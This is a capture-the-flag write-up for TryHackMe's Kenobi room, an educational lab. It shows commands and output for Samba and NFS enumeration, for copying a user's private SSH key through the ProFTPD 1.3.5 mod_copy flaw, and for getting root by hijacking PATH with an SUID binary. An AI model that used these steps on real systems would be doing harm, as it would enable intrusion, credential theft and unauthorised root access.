Kenobi
This is a writeup for the Kenobi challenge on Try-Hack-Me. This room will cover accessing a Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate your privileges to root via an SUID binary. Rated as Easy/Beginner level machine.
Introduction
In this post, we’ll try to root Kenobi. It was created by tryhackme. It is rated as Easy/Beginner level machine.
Goal: Enumerate Samba share, manipulate a vulnerable version of proftpd to gain initial access and escalate your privileges to root via an SUID binary.
Prerequisites
Kali Linux / Parrot Security OS
The virtual machine we’ll use to source the attack vectors against the Kenobi machine. These Linux distribution has all required tools pre-installed. Choose one of them.
- Kali Linux VM (based on Debian distribution) can be downloaded for both VMware and VirtualBox from Offensive-Security
- Parrot Security VM (based on Arch distribution with different desktop flavors) can be downloaded from Parrot Security
TryHackMe account
Signup or login to TryHackMe, deploy the machine and give it a couple of minutes to boot.
Dedicated Directory
We need to create a dedicated directory in our home directory ~ for our findings. We’ll use mkdir to create the directory and cd to change into it:
1
2
$ mkdir ~/tryhackme/kenobi
$ cd ~/tryhackme/kenobi/
Add IP to hosts file [OPTIONAL]
For better readability we’ll add the target IP to our local /etc/hosts file. Please note this command requires sudo privileges.
1
2
3
4
5
6
$ sudo nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.214.193 kenobi
...
Now we can use the ‘kenobi’ hostname instead of the IP in all the commands.
Scanning
nmap
We’ll start with scanning the target for open ports using nmap. The command we’ll use is sudo nmap -sV -T4 -p- -O -oN nmap kenobi which is a full TCP-SYN scan to scan all ports on the target. Let’s break it down:
-sVdetermine service/version info-T4for faster execution-p-scan all ports-Oidentify Operating System-oNoutput to file, in our case it’s called nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ sudo nmap -sV -T4 -p- -O -oN nmap kenobi
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-01 13:17 EST
Nmap scan report for 10.10.214.193
Host is up (0.083s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
36027/tcp open mountd 1-3 (RPC #100005)
38413/tcp open nlockmgr 1-4 (RPC #100021)
42535/tcp open mountd 1-3 (RPC #100005)
48227/tcp open mountd 1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
...
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
...
SMB/SAMBA
We found active Samba services on both port 139 and 445. Using the suggested command in TryHackMe page, we can enumerate the shares:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
$ sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse kenobi
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-01 13:48 EST
Nmap scan report for kenobi
Host is up (0.082s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\kenobi\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\kenobi\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\kenobi\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 13.33 seconds
Now we’ll use smbclient to inspect the anonymous sharename using anonymous user: smbclient //kenobi/anonymous -U anonymous (leave WORKGROUP empty). We’re greeted with a command prompt. Using ls command we can list the directory files (use help command for additional commands) and find an interesting file. using get command we can download it to our machine and read it locally in our machine.
- Note:
- In case there are many files in a given share, you can recursively download the file using
smbget -R smb://<ip>/anonymous.
RPC / RPCBIND
rpcbind is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve. We’ll use the following scripts built into nmap script engine to enumerate the RPC: nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount kenobi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount kenobi
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-02 07:36 EST
Nmap scan report for kenobi
Host is up (0.078s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2021-01-02T12:25:02 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1837060.0 6876568.0 22% 16.0T 32000
Nmap done: 1 IP address (1 host up) scanned in 1.62 seconds
Gaining Access
ProFTPd
- Note:
- Before using searchsploit, you might need to update it using
apt update; apt install metasploit-frameworkcommand.
According the initial nmap scan, we found the running proftp service running on port 21. The service version is 1.3.5. We can use searchsploit to find known vulnerabilities for that version:
1
2
3
4
5
6
7
8
9
searchsploit proftpd 1.3.5
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Read more about the mod_copy module HERE. To summarize, we can use this module to copy files from one location to another. One key file in Linux systems is the private SSH key. In this case it belongs to kenobi user. We’ll use netcat (nc) to connect to the FTP port and use SITE CPFR (copy from) and SITE CPTO (copy to) commands to copy the key file:
1
2
3
4
5
6
nc kenobi
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [kenobi]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
We now have a copy of the private key (id_rsa file) in a location we can access - /var(see section about SMB/SAMBA). Let’s mount that directory to our machine in order to access it (please double check if sudo is required on your environment):
- Create a mount directory on our machine -
sudo mkdir /mnt/kenobi - Mount the remote directory to our machine -
sudo mount kenobi:/var /mnt/kenobi - List available files to verify
ls -la /mnt/kenobi/tmp - For ease of use I prefer to copy that file into my working directory/project directory -
cp /mnt/kenobi/tmp/id_rsa. You may choose another location. - Unmount the directory -
sudo umount /mnt/kenobi
SSH
Now we can use that private key to login as the Kenobi user using SSH - ssh kenobi@kenobi -i id_rsa where -i flag is used to specify the private key location.
We get the following warning:
1
2
3
4
5
6
7
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
Which means we need to change the file permission using chmod sudo chmod 600 id_rsa.
No run the ssh command again to gain access the system.
Now we only need to retrieve the flag file from Kenobie’s home directory:
1
2
$ cat /home/kenobi/user.txt
[REDACTED]
Privilege Escalation
- Note:
- Explanation about SUID, SGID and Sticky Bits can be found on Red Hat website and TryHackMe:
Let’s look for files that have the SUID Bit enabled - find / -perm -u=s -type f 2>/dev/null
/is the root path to start the scan from-perm -u=sSUID bit enabled-type fsearch for file (dfor directory)2>/dev/nullthis will produce a cleaner output as it will redirect any errors, such as permission errors to /dev/null instead of the screen.
We can note an unusual file in /usr/bin/menu.
We can check the file permissions using ls -l:
1
2
$ ls -l /usr/bin/menu
-rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/menu
As we can see the file is running using belongs to root. keep that in mind as it will be useful next.
Executing the binary file will prompt us with the following:
1
2
3
4
5
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
Let’s have a look into the binary file and try to find anything useful. Sometimes it’s not possible due to compilation of the file.
If we want to look into this binary we can use simple cat command. Yet the output is messy. Using strings command is much better as it’s output is only readable characters - strings /usr/bin/menu.
We see that depending on our choice, the binary is invoking Linux commands behind the scene - curl, uname and ifconfig. As the binary running these commands without using their full path - curl, not /usr/bin/curl - we might be able to manipulate the command path and make the binary invoke a malicious command instead (keep in mind it is running as root!)
To overwrite curl path and make our script invoke bash instead, we’ll:
- Change dir to
/tmpas that folder permissions is very permissive - Create a new file called
curlwhich contains the malicious command (run bash) -echo /bin/bash > curland change the file permissions so it can be executed -chmod 777 curl - Overwrite
curlpath -export PATH=/tmp:$PATH - Run the binary and choose 1 to make it call our malicious curl
1
2
3
4
5
6
7
8
9
/usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
- Now use whoami to verify we’re root
Now as root we can access the flag:
1
2
cat /root/root.txt
[REDACTED]
Summary
- SAMBA can be a series risk to a machine and a good attack vector for an attacker